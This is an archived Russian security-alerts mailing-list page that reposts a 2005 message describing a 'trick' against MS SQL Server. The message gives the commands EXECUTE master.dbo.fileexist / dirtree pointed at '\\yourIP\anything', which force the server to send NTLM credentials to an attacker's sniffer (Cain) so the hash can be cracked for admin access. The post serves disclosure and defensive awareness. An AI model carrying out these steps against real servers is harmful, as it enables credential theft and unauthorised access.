ðòïåëôù 


  áòèé÷ 


Apache-Talk @lexa.ru 

Inet-Admins @info.east.ru 

Filmscanners @halftone.co.uk 

Security-alerts @yandex-team.ru 

nginx-ru @sysoev.ru 

  óôáôøé 


  ðåòóïîáìøîïå 


  ðòïçòáííù 



ðéûéôå
ðéóøíá














     áòèé÷ :: Security-alerts
Security-Alerts mailing list archive (security-alerts@yandex-team.ru)

[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

[security-alerts] trick for MS SQL Server



 

> -----Original Message-----
> From: Argeniss [mailto:lists@xxxxxxxxxxxx] 
> Sent: Thursday, November 17, 2005 9:23 PM
> To: websecurity@xxxxxxxxxxxxx
> Subject: Re: [WEB SECURITY] RE: Blind SQL Injection / Stored 
> procedures
> 
> I would like to mention a trick for MS SQL Server (this is a Windows
> weaknesses so it can be exploited on other applications as 
> well) that is not
> well known and it could be really dangerous, it has some 
> limitations, ie: if
> SQL Server is behind a firewall blocking connection, etc.
> 
> -By default Windows sends NTLM credentials when 
> authenticating to network
> shares.
> -Run Cain tool on your computer
> -Start sniffer.
> -On victim server
> EXECUTE master.dbo.fileexist '\\yourIP\anything'
> or
> EXECUTE master.dbo.dirtree '\\yourIP\anything'
> -Check on Cain SMB captured passwords
> -Send it to cracker.
> -Crack it.
> 
> If SQL Server is not running under system account and if the 
> password is
> weak then it can be cracked and then get admin access to SQL Server.
> 
> Enjoy.
> 
> Cesar.




 




Copyright © Lexa Software, 1996-2009.